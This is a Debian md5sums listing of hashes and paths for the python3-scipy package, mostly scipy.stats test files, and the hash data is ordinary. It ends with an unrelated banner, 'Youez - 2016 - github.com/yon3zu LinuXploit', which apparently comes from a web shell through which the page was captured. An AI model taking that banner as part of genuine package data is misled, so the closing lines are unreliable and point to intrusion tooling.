f426ab7127312dab1b145df36305fb0b  usr/lib/python3/dist-packages/scipy/stats/tests/test_axis_nan_policy.py
71db69dfc56a7c929df718d6bf34c489  usr/lib/python3/dist-packages/scipy/stats/tests/test_binned_statistic.py
cf8902a2eb8e89c73c5dd1e758f84e18  usr/lib/python3/dist-packages/scipy/stats/tests/test_boost_ufuncs.py
386f9e730ab8c6d7d7591d09b8c3ed8c  usr/lib/python3/dist-packages/scipy/stats/tests/test_censored_data.py
4340d2b6c1b189dac7e999c9777c07fb  usr/lib/python3/dist-packages/scipy/stats/tests/test_contingency.py
31d7a55218b73ee2e98de90c432e4487  usr/lib/python3/dist-packages/scipy/stats/tests/test_continuous_basic.py
8aec3c3830f88e38c11926432924c582  usr/lib/python3/dist-packages/scipy/stats/tests/test_continuous_fit_censored.py
e809c85530676951c41c4273828f8556  usr/lib/python3/dist-packages/scipy/stats/tests/test_crosstab.py
048ad3bfb921054e9f4477cff026f7be  usr/lib/python3/dist-packages/scipy/stats/tests/test_discrete_basic.py
bfe15b72ecbcb66145616f22d89afaf3  usr/lib/python3/dist-packages/scipy/stats/tests/test_discrete_distns.py
2c1f7226bdb977401c969ab4d44f8a72  usr/lib/python3/dist-packages/scipy/stats/tests/test_distributions.py
ee0713ebef086103f779f53a0dd293a2  usr/lib/python3/dist-packages/scipy/stats/tests/test_entropy.py
f3037f44aab5c434c544c137289990de  usr/lib/python3/dist-packages/scipy/stats/tests/test_fit.py
77458e069b4a38ca118782af73e0ab97  usr/lib/python3/dist-packages/scipy/stats/tests/test_hypotests.py
8d5d402f52b198d01583783527536a0d  usr/lib/python3/dist-packages/scipy/stats/tests/test_kdeoth.py
2a58f8666c4416caa0b96845a2607bc5  usr/lib/python3/dist-packages/scipy/stats/tests/test_morestats.py
0275479ad93eaf5a4b4b515484854274  usr/lib/python3/dist-packages/scipy/stats/tests/test_mstats_basic.py
57cfaaee848b9e0d23ce3de8e9a599a4  usr/lib/python3/dist-packages/scipy/stats/tests/test_mstats_extras.py
c4d6cdadeabdcf750f4ac0115562edb0  usr/lib/python3/dist-packages/scipy/stats/tests/test_multicomp.py
b7991db527b37fc2044393ffc4901097  usr/lib/python3/dist-packages/scipy/stats/tests/test_multivariate.py
0f3807c93d81b999c8297bd223b9b23b  usr/lib/python3/dist-packages/scipy/stats/tests/test_odds_ratio.py
6c422c8e7a06a0dbe83f202048cec2f8  usr/lib/python3/dist-packages/scipy/stats/tests/test_qmc.py
c8c12450952600e1dc7ece6a0db0f39e  usr/lib/python3/dist-packages/scipy/stats/tests/test_rank.py
e885711493ebddcfd682f58806f2fad6  usr/lib/python3/dist-packages/scipy/stats/tests/test_relative_risk.py
032e990b1a0bab2dc41838917b769348  usr/lib/python3/dist-packages/scipy/stats/tests/test_resampling.py
73499c8f4f4d9f5eeb4e119277c9f697  usr/lib/python3/dist-packages/scipy/stats/tests/test_sampling.py
f7984c0eca1b111c883d26b96c7425ab  usr/lib/python3/dist-packages/scipy/stats/tests/test_sensitivity_analysis.py
a1eba03093576fe2b8345df8d81d21c3  usr/lib/python3/dist-packages/scipy/stats/tests/test_stats.py
9761e56589f0ca1862954785a572b757  usr/lib/python3/dist-packages/scipy/stats/tests/test_survival.py
2df15a449347daa69adef760044aeff7  usr/lib/python3/dist-packages/scipy/stats/tests/test_tukeylambda_stats.py
2a2bf93cf95d5633a7698617905bf190  usr/lib/python3/dist-packages/scipy/stats/tests/test_variation.py
3cf5c0f23d06a2f02fa6e15cb1b4143f  usr/lib/python3/dist-packages/scipy/version.py
90d5c1ea40ac190007fcc03707725e88  usr/share/doc/python3-scipy/changelog.Debian.gz
80ca52e4203f9f37bfa6c8775e1ad8f9  usr/share/doc/python3-scipy/copyright
00148534da30a3783ba7801256412ade  usr/share/lintian/overrides/python3-scipy

Youez - 2016 - github.com/yon3zu
LinuXploit